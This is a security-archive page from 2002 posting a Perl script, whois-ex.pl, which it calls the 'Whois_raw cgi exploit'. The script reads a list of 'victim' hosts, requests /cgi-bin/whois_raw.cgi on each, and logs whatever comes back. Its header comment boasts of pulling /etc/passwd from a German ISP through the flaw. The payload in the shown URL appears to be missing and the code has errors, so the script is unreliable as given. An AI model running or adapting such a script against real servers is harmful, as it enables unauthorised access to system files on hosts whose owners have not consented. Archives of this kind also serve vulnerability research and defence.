whois-ex.pl

whois-ex.pl: Posted Jul 3, 2002; Authored by Lawrence Lavigne, Michelle Welday; This is a perl script that checks for the whois_raw cgi vulnerability. Code ripped from Piffys issscan.pl.; tags | tool, cgi, scanner, perl; systems | unix; SHA-256 | 79a982f5b7207a58334998ccd349d93b3fadbc457f773bd51bd09e4d6b8f8b1a; Download | Favorite | View

whois-ex.pl

##########################################################################
#  This is a script that checks for the cgi whois_raw vulnerabillity.    #
# The idea was inspired after having pulled up an encrypted /etc/passwd  #
# file on a German ISP using the /cgi-bin/whois_raw.cgi? vulnerabillity. #
#          This code was ripped from iisscan by Piffy.                   #
 ##########################################################################

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

my $def = new LWP::UserAgent;
my @victim;
my $userresp;

print "\nNeoErudition Technologies\n";
print "Whois_raw cgi exploit\n\n";
print "\nCoded by RatDance\n";
print "Enter Y or N to continue. [Y/N]: ";
while(1) {
        chomp($userresp = <STDIN>);
        if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
                print "Continueing...\n";
                last;
        } elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
                print "Exiting as requested.\n";
    exit;
        } else {
                print "Thats not a valid answer. [Y/N]: ";
        }
}
print "\nWhat file contains the victim address: ";

chomp(my $victim=<STDIN>);
open(IN, $victim) || die "\nCould not open $victim: $!"; 
while (<IN>) 
{ 
  $victim[$a] = $_; 
  chomp $victim[$a]; 
  $a++; 
        $b++; 
} 
close(IN);
$a = 0; 
print "whois raw exploit initiated..\n";
while ($a < $b) 
{ 
  my $url="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
  my $request = new HTTP::Request('GET', $url);
  my $response = $def->request($request);
  if ($response->is_success) {
    print $response->content;
  open(OUT, ">>exploit_whois.log"); 
  print OUT "\n$victim[$a] : $response->content"; 
  -close OUT; 
     } else {
    print $response->error_as_HTML;
  }
  &second()
} 

sub second() {
  my $url2="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
  my $request = new HTTP::Request('GET', $url2);
  my $response = $def->request($request);
  if ($response->is_success) {
    print $response->content;
  open(OUT, ">>exploit_whois.log"); 
  print OUT "\n$victim[$a] : $response->content"; 
  -close OUT; 
     } else {
    print $response->error_as_HTML;
  }
  $a++; 
}

Top Authors In Last 30 Days

Red Hat 141 files
Ubuntu 102 files
Debian 25 files
Google Security Research 11 files
LiquidWorm 10 files
Muhammad Navaid Zafar Ansari 7 files
Abdulhakim Oner 6 files
Jann Horn 5 files
fearzzzz 5 files
nu11secur1ty 5 files

File Archives

Systems

AIX (426)
Apple (1,951)
BSD (370)
CentOS (56)
Cisco (1,919)
Debian (6,711)
Fedora (1,691)
FreeBSD (1,242)
Gentoo (4,288)
HPUX (878)
iOS (338)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,066)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,879)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,431)
UNIX (9,206)
UnixWare (185)
Windows (6,530)
Other

whois-ex.pl

whois-ex.pl

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

whois-ex.pl

Share This

whois-ex.pl

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems